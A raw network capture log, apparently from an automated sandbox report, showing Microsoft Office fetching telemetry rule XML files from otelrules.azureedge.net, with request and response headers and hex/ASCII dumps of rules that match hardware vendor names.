                                                                                                                          2024-10-13 16:21:36 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          37192.168.2.44980013.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:36 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:36 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:36 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 419
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                                                                                          ETag: "0x8DC582B9748630E"
                                                                                                                          x-ms-request-id: 94af9378-501e-0047-4aca-1ace6c000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162136Z-17db6f7c8cfbr2wt66emzt78g400000004mg00000000c2wx
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:36 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          38192.168.2.44980213.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:36 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:36 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:36 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 404
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                                                                                                          ETag: "0x8DC582B9E8EE0F3"
                                                                                                                          x-ms-request-id: fa6a24a8-e01e-0099-78e3-1ada8a000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162136Z-17db6f7c8cfgqlr45m385mnngs00000003kg00000000f2nq
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:36 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          39192.168.2.44980113.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:36 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:36 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:36 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 472
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                          ETag: "0x8DC582B9DACDF62"
                                                                                                                          x-ms-request-id: a5b27f46-b01e-003d-5a47-1cd32c000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162136Z-17db6f7c8cffhvbz3mt0ydz7x400000003a0000000009421
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:36 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          40192.168.2.44980313.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:36 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:36 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:36 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 468
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                          ETag: "0x8DC582B9C8E04C8"
                                                                                                                          x-ms-request-id: 11c3f343-501e-0078-0139-1c06cf000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162136Z-17db6f7c8cfjxfnba42c5rukwg000000024g000000005y4q
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:36 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          41192.168.2.44980413.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:37 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:37 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:37 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 428
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                          ETag: "0x8DC582BAC4F34CA"
                                                                                                                          x-ms-request-id: ec733f58-401e-0035-529c-1b82d8000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162137Z-17db6f7c8cfvtw4hh2496wp8p800000003eg00000000hr5s
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:37 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          42192.168.2.44980513.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:37 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:37 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:37 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 415
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                          ETag: "0x8DC582B988EBD12"
                                                                                                                          x-ms-request-id: 3776c2af-901e-0048-1a6f-1cb800000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162137Z-17db6f7c8cffhvbz3mt0ydz7x4000000037000000000gykx
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:37 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          43192.168.2.44980713.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:37 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:37 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:37 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 471
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                          ETag: "0x8DC582BB5815C4C"
                                                                                                                          x-ms-request-id: 7708100b-601e-003e-5be1-1a3248000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162137Z-17db6f7c8cfp6mfve0htepzbps00000004gg00000000apu6
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:37 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          44192.168.2.44980613.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:37 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:37 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:37 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 499
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                                                                                                          ETag: "0x8DC582B98CEC9F6"
                                                                                                                          x-ms-request-id: 483006ab-801e-0035-465b-1c752a000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162137Z-17db6f7c8cfmhggkx889x958tc000000028000000000ckcx
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:37 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          45192.168.2.44980813.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:37 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:37 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:37 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 419
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                          ETag: "0x8DC582BB32BB5CB"
                                                                                                                          x-ms-request-id: d4fa587e-101e-008e-331f-1ccf88000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162137Z-17db6f7c8cf8rgvlb86c9c0098000000037g000000008wqx
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:37 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          46192.168.2.44981213.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:38 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:38 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:38 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 427
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                                                                                                          ETag: "0x8DC582BA909FA21"
                                                                                                                          x-ms-request-id: 69483ed4-001e-0034-56df-1add04000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162138Z-17db6f7c8cfnqpbkckdefmqa44000000051000000000f8yz
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:38 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
